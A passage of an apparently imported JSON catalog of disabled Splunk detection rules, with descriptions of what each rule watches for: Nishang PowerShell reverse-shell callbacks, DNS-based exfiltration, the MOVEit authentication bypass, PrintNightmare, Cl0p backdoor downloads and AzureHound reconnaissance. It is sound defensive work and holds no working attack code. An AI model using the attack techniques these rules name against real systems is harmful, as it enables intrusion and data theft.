"This hunting query detects user interactions with MSIX packages by monitoring EventCode 171 in the Microsoft-Windows-AppXPackaging/Operational logs. These events are generated when a user clicks on or attempts to interact with an MSIX package, even if the package is not fully installed. This information can be valuable for security teams to identify what MSIX packages users are attempting to open in their environment, which may help detect malicious MSIX packages before they're fully installed. Monitoring these interactions can provide early warning of potential MSIX package abuse, which has been leveraged by threat actors such as FIN7, Zloader (Storm-0569), and FakeBat (Storm-1113).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msix-package-interaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a06689d-814e-4db2-b2c7-5a174f8c2d6d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msix_package_interaction.yml" } }, { "id": "splunk-security-content-1a382c6c-7c2e-11eb-ac69-acde48001122", "type": "detection", "name": "Nishang PowershellTCPOneLine", "description": "The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server. It leverages Endpoint Detection and Response (EDR) data, focusing on PowerShell processes that include specific .NET classes like Net.Sockets.TCPClient and System.Text.ASCIIEncoding. This activity is significant as it indicates potential remote control or data exfiltration attempts by an attacker. If confirmed malicious, this could lead to unauthorized remote access, data theft, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nishang-powershelltcponeline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a382c6c-7c2e-11eb-ac69-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/nishang_powershelltcponeline.yml" } }, { "id": "splunk-security-content-1a537acc-199f-4713-b5d7-3d98c05ab932", "type": "detection", "name": "MOVEit Empty Key Fingerprint Authentication Attempt", "description": "This detection identifies attempts to authenticate with an empty public key fingerprint in Progress MOVEit Transfer, which is a key indicator of potential exploitation of the CVE-2024-5806 vulnerability. Such attempts are characteristic of the authentication bypass technique used in this vulnerability, where attackers try to impersonate valid users without providing proper credentials. While occasional empty key fingerprint authentication attempts might occur due to misconfigurations, a sudden increase or attempts from unexpected sources could signify malicious activity. This analytic helps security teams identify and investigate potential exploitation attempts of the MOVEit Transfer authentication bypass vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/moveit-empty-key-fingerprint-authentication-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a537acc-199f-4713-b5d7-3d98c05ab932", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/moveit_empty_key_fingerprint_authentication_attempt.yml" } }, { "id": "splunk-security-content-1a67f15a-f4ff-4170-84e9-08cf6f75d6f5", "type": "detection", "name": "DNS Query Length With High Standard Deviation", "description": "The following analytic identifies DNS queries with unusually large lengths by computing the standard deviation of query lengths and filtering those exceeding two times the standard deviation. It leverages DNS query data from the Network_Resolution data model, focusing on the length of the domain names being resolved. This activity is significant as unusually long DNS queries can indicate data exfiltration or command-and-control communication attempts. If confirmed malicious, this activity could allow attackers to stealthily transfer data or maintain persistent communication channels within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-query-length-with-high-standard-deviation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a67f15a-f4ff-4170-84e9-08cf6f75d6f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/dns_query_length_with_high_standard_deviation.yml" } }, { "id": "splunk-security-content-1a77c08c-2f56-409c-a2d3-7d64617edd4f", "type": "detection", "name": "No Windows Updates in a time frame", "description": "The following analytic identifies Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. It leverages the 'Update' data model in Splunk, specifically looking for the latest 'Installed' status events from Microsoft Windows. This activity is significant for a SOC because endpoints that are not regularly patched are vulnerable to known exploits and security vulnerabilities. If confirmed malicious, this could indicate a compromised endpoint that is intentionally being kept unpatched, potentially allowing attackers to exploit unpatched vulnerabilities and gain unauthorized access or control.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/no-windows-updates-in-a-time-frame.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a77c08c-2f56-409c-a2d3-7d64617edd4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/no_windows_updates_in_a_time_frame.yml" } }, { "id": "splunk-security-content-1a7e7650-b81d-492e-99d4-d5ab633afbdd", "type": "detection", "name": "Windows Unusual Process Load Mozilla NSS-Mozglue Module", "description": "The following analytic identifies processes loading Mozilla NSS-Mozglue libraries such as mozglue.dll and nss3.dll. It leverages Sysmon Event logs, specifically monitoring EventCode 7, which tracks image loaded events. This activity is significant because it can indicate unauthorized access or manipulation of these libraries, which are commonly used by Mozilla applications like Firefox and Thunderbird. If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-process-load-mozilla-nss-mozglue-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a7e7650-b81d-492e-99d4-d5ab633afbdd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_process_load_mozilla_nss_mozglue_module.yml" } }, { "id": "splunk-security-content-1abce487-f480-4d5f-a551-01de0bece0bd", "type": "detection", "name": "Cisco TFTP Server Configuration for Data Exfiltration", "description": "This analytic detects the configuration of TFTP services on Cisco IOS devices that could be used to exfiltrate sensitive configuration files. Threat actors like Static Tundra have been observed configuring TFTP servers to make device configuration files accessible for exfiltration after gaining initial access. The detection specifically looks for commands that expose critical configuration files such as startup-config, running-config, and other sensitive system information through TFTP. This activity is particularly concerning as it may represent an attempt to steal credentials, network topology information, and other sensitive data stored in device configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-tftp-server-configuration-for-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1abce487-f480-4d5f-a551-01de0bece0bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_tftp_server_configuration_for_data_exfiltration.yml" } }, { "id": "splunk-security-content-1acafff9-1347-4b40-abae-f35aa4ba85c1", "type": "detection", "name": "Windows Odbcconf Load Response File", "description": "The following analytic detects the execution of odbcconf.exe with a response file, which may contain commands to load a DLL (REGSVR) or other instructions. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to execute arbitrary code or load malicious DLLs, potentially leading to unauthorized actions. If confirmed malicious, this could allow an attacker to gain code execution, escalate privileges, or establish persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-load-response-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1acafff9-1347-4b40-abae-f35aa4ba85c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_load_response_file.yml" } }, { "id": "splunk-security-content-1ad89d24-c856-4a0e-8fdf-c20c7b9febe1", "type": "detection", "name": "Windows AI Platform DNS Query", "description": "The following analytic detects DNS queries initiated by the Windows AI Platform to domains associated with Hugging Face, OpenAI, and other popular providers of machine learning models and services. Monitoring these DNS requests is important because it can reveal when systems are accessing external AI platforms, which may indicate the use of third-party AI resources or the transfer of sensitive data outside the organization\u2019s environment. Detecting such activity enables organizations to enforce data governance policies, prevent unapproved use of external AI services, and maintain visibility into potential data exfiltration risks. Proactive monitoring provides better control over AI model usage and helps safeguard organizational data flows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ai-platform-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ad89d24-c856-4a0e-8fdf-c20c7b9febe1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ai_platform_dns_query.yml" } }, { "id": "splunk-security-content-1adc9548-da7c-11eb-8f13-acde48001122", "type": "detection", "name": "Print Spooler Failed to Load a Plug-in", "description": "The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as \"meterpreter.dll,\" with error code 0x45A. This detection method leverages specific event codes and error messages. This activity is significant as it may indicate an exploitation attempt of a known vulnerability. If confirmed malicious, an attacker could gain unauthorized code execution on the affected system, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-spooler-failed-to-load-a-plug-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1adc9548-da7c-11eb-8f13-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_spooler_failed_to_load_a_plug_in.yml" } }, { "id": "splunk-security-content-1adffe86-10c3-11ec-8ce6-acde48001122", "type": "detection", "name": "Rundll32 Control RunDLL World Writable Directory", "description": "The following analytic detects the execution of rundll32.exe with the `Control_RunDLL` command, loading files from world-writable directories such as windows\\temp, programdata, or appdata. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process command-line data and specific directory paths. This activity is significant as it may indicate an attempt to exploit CVE-2021-40444 or similar vulnerabilities, allowing attackers to execute arbitrary code. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-control-rundll-world-writable-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1adffe86-10c3-11ec-8ce6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_control_rundll_world_writable_directory.yml" } }, { "id": "splunk-security-content-1ae407b0-a042-4eb0-834a-590da055575e", "type": "detection", "name": "Windows File and Directory Enable ReadOnly Permissions", "description": "The following analytic detects instances where file or folder permissions are modified to grant read-only access. Such changes are characterized by the presence of read-related permissions (e.g., R, REA, RA, RD) and the absence of write (W) or execute (E) permissions. Monitoring these events is crucial for tracking access control changes that could be intentional for restricting access or indicative of malicious behavior. Alerts generated by this detection help ensure that legitimate security measures are enforced while unauthorized changes are promptly investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-enable-readonly-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ae407b0-a042-4eb0-834a-590da055575e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_enable_readonly_permissions.yml" } }, { "id": "splunk-security-content-1af84ac8-05ea-4f11-8541-b2d1e45a7744", "type": "detection", "name": "Windows RDP Client Launched with Admin Session", "description": "This detection identifies the execution of the Windows Remote Desktop Client (mstsc.exe) with the \"/v\" and /admin command-line arguments. The \"/v\" flag specifies the remote host to connect to, while the /admin flag initiates a connection to the target system\u2019s console session, often used for administrative purposes. This combination may indicate that a user or attacker is performing privileged remote access, potentially to manage a system without disrupting existing user sessions. While such usage may be legitimate for IT administrators, it is less common in typical user behavior. Threat actors may abuse this capability during lateral movement to maintain stealthy access to high-value systems. Monitoring for this pattern can help detect interactive hands-on-keyboard activity, privilege abuse, or attempts to access critical infrastructure without leaving typical login traces associated with non-admin RDP sessions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-client-launched-with-admin-session.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1af84ac8-05ea-4f11-8541-b2d1e45a7744", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_client_launched_with_admin_session.yml" } }, { "id": "splunk-security-content-1b7bfb2c-b8e6-11eb-99ac-acde48001122", "type": "detection", "name": "Detect Renamed WinRAR", "description": "The following analytic identifies instances where `WinRAR.exe` has been renamed and executed. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names within the Endpoint data model. This activity is significant because renaming executables is a common tactic used by attackers to evade detection. If confirmed malicious, this could indicate an attempt to bypass security controls, potentially leading to unauthorized data extraction or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-winrar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1b7bfb2c-b8e6-11eb-99ac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_winrar.yml" } }, { "id": "splunk-security-content-1b8a468a-52e3-4206-b14a-73165441684c", "type": "detection", "name": "Windows Chromium Process Loaded Extension via Command-Line", "description": "The following analytic detects instances where Google Chrome is started with the --load-extension command-line flag, which allows loading unpacked or non-standard extensions. This behavior can indicate attempts to bypass enterprise extension policies, install malicious extensions, or load potentially harmful browser components. Monitoring such activity helps identify unauthorized extension usage, potential malware persistence mechanisms, or policy violations that could compromise browser security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-loaded-extension-via-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1b8a468a-52e3-4206-b14a-73165441684c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_loaded_extension_via_command_line.yml" } }, { "id": "splunk-security-content-1bbe54f1-93d7-4764-8a01-ddaa12ece7ac", "type": "detection", "name": "ASL AWS IAM Successful Group Deletion", "description": "The following analytic detects the successful deletion of a group within AWS IAM, leveraging CloudTrail IAM events. This action, while not inherently malicious, can serve as a precursor to more sinister activities, such as unauthorized access or privilege escalation attempts. By monitoring for such deletions, the analytic aids in identifying potential preparatory steps towards an attack, allowing for early detection and mitigation. The identification of this behavior is crucial for a SOC to prevent the potential impact of an attack, which could include unauthorized access to sensitive resources or disruption of AWS environment operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-successful-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bbe54f1-93d7-4764-8a01-ddaa12ece7ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_successful_group_deletion.yml" } }, { "id": "splunk-security-content-1bc8f235-5d7c-457c-95ca-5e92edcb52ea", "type": "detection", "name": "ESXi Shared or Stolen Root Account", "description": "This detection monitors for signs of a shared or potentially compromised root account on ESXi hosts by tracking the number of unique IP addresses logging in as root within a short time window. Multiple logins from different IPs in a brief period may indicate credential misuse, lateral movement, or account compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-shared-or-stolen-root-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bc8f235-5d7c-457c-95ca-5e92edcb52ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_shared_or_stolen_root_account.yml" } }, { "id": "splunk-security-content-1be30d80-3a39-4df9-9102-64a467b24abc", "type": "detection", "name": "Living Off The Land Detection", "description": "The following correlation identifies multiple risk events associated with the \"Living Off The Land\" analytic story, indicating potentially suspicious behavior. It leverages the Risk data model to aggregate and correlate events tagged under this story, focusing on systems with a high count of distinct sources. This activity is significant as it often involves the use of legitimate tools for malicious purposes, making detection challenging. If confirmed malicious, this behavior could allow attackers to execute code, escalate privileges, or persist within the environment using trusted system utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190", "T1059", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/living-off-the-land-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1be30d80-3a39-4df9-9102-64a467b24abc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/living_off_the_land_detection.yml" } }, { "id": "splunk-security-content-1bed7774-304a-4e8f-9d72-d80e45ff492b", "type": "detection", "name": "Detect Outbound SMB Traffic", "description": "The following analytic detects outbound SMB (Server Message Block) connections from internal hosts to external servers. It identifies this activity by monitoring network traffic for SMB requests directed towards the Internet, which are unusual for standard operations. This detection is significant for a SOC as it can indicate an attacker's attempt to retrieve credential hashes through compromised servers, a key step in lateral movement and privilege escalation. If confirmed malicious, this activity could lead to unauthorized access to sensitive data and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outbound-smb-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bed7774-304a-4e8f-9d72-d80e45ff492b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_outbound_smb_traffic.yml" } }, { "id": "splunk-security-content-1bf500e5-1226-41d9-af5d-ed1f577929f2", "type": "detection", "name": "Windows Important Audit Policy Disabled", "description": "The following analytic detects the disabling of important audit policies. It leverages EventCode 4719 from Windows Security Event Logs to identify changes where success or failure auditing is removed. This activity is significant as it suggests an attacker may have gained access to the domain controller and is attempting to evade detection by tampering with audit policies. If confirmed malicious, this could lead to severe consequences, including data theft, privilege escalation, and full network compromise. Immediate investigation is required to determine the source and intent of the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-important-audit-policy-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bf500e5-1226-41d9-af5d-ed1f577929f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_important_audit_policy_disabled.yml" } }, { "id": "splunk-security-content-1bf631d1-44a0-472b-98c4-2975b8b281df", "type": "detection", "name": "Cisco Duo Admin Login Unusual Country", "description": "The following analytic detects instances where a Duo admin login originates from a country outside of the United States, which may indicate suspicious or unauthorized access attempts. Please adjust as needed to your environment. It works by analyzing Duo activity logs for admin login actions and filtering out events where the access device's country is not within the expected region. By correlating user, device, browser, and location details, the analytic highlights anomalies in geographic login patterns. This behavior is critical for a SOC to identify because admin accounts have elevated privileges, and access from unusual countries can be a strong indicator of credential compromise, account takeover, or targeted attacks. Early detection of such activity enables rapid investigation and response, reducing the risk of unauthorized changes, data breaches, or further lateral movement within the environment. The impact of this attack can be severe, potentially allowing attackers to bypass security controls, alter configurations, or exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1bf631d1-44a0-472b-98c4-2975b8b281df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_country.yml" } }, { "id": "splunk-security-content-1c077b8a-95a3-4692-980d-c72fc50e9930", "type": "detection", "name": "Cisco Secure Firewall - Oracle E-Business Suite Exploitation", "description": "This analytic detects vulnerability exploitation and post-compromise activity associated with Oracle E-Business Suite web-application vulnerabilities, CVE-2025-61882 and CVE-2025-61884.\nSIDs 65413-65415 detect detect Java.Backdoor.Cl0p variant payload downloads and Java.Backdoor.Cl0p outbound\ncommand-and-control connection attempts.\nSIDs 65456, 65377 and 65378 detect attempts to exploit these vulnerabilities.\nSecurity teams should investigate any instances of these signatures, especially if they are found in conjunction with other suspicious network activity or on systems that should not be exposed to such threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-oracle-e-business-suite-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c077b8a-95a3-4692-980d-c72fc50e9930", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___oracle_e_business_suite_exploitation.yml" } }, { "id": "splunk-security-content-1c21fed1-7000-4a2e-9105-5aaafa437247", "type": "detection", "name": "Okta Multiple Failed Requests to Access Applications", "description": "The following analytic detects multiple failed attempts to access applications in Okta, potentially indicating the reuse of a stolen web session cookie. It leverages Okta logs to evaluate policy and SSO events, aggregating data by user, session, and IP. The detection triggers when more than half of the app sign-on attempts are unsuccessful across multiple applications. This activity is significant as it may indicate an attempt to bypass authentication mechanisms. If confirmed malicious, it could lead to unauthorized access to sensitive applications and data, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.004", "T1538" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-failed-requests-to-access-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c21fed1-7000-4a2e-9105-5aaafa437247", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_failed_requests_to_access_applications.yml" } }, { "id": "splunk-security-content-1c34549e-c31b-11eb-996b-acde48001122", "type": "detection", "name": "Detect AzureHound File Modifications", "description": "The following analytic detects the creation of specific AzureHound-related files, such as `*-azurecollection.zip` and various `.json` files, on disk. It leverages data from the Endpoint.Filesystem datamodel, focusing on file creation events with specific filenames. This activity is significant because AzureHound is a tool used to gather information about Azure environments, similar to SharpHound for on-premises Active Directory. If confirmed malicious, this activity could indicate an attacker is collecting sensitive Azure environment data, potentially leading to further exploitation or privilege escalation within the cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-azurehound-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1c34549e-c31b-11eb-996b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 